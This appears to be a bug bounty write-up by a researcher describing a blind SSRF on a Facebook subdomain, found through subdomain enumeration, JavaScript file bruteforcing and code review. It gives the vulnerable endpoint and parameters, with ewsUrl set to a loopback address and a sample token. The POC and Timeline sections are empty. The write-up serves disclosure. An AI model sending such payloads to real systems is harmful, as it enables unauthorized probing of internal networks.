$10000 Facebook SSRF (Bug Bounty)

Subdomains enumeration + File bruteforcing + JS analysis = $10K Blind SSRF

This is a write-up about a SSRF vulnerability I found on Facebook.

The vulnerability could have allowed a malicious user to send internal requests to the Facebook corporate network.

1) Subdomains Enumeration

If you have read my previous write-up « Story of a weird vulnerability I found on Facebook » you know already how much I love these 403 errors.

2) Javascript File Bruteforcing

I found a hidden Home.js file (https://phishme.thefacebook.com/Home.js)

3) Code Review of Home.js

By digging deeper into the code, I found that this function was used as following:

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

Exploitation:

Params:

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

POC:

The stack-traces helped to gather information about the internal requests sent.

Timeline:

Amine Aboud

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.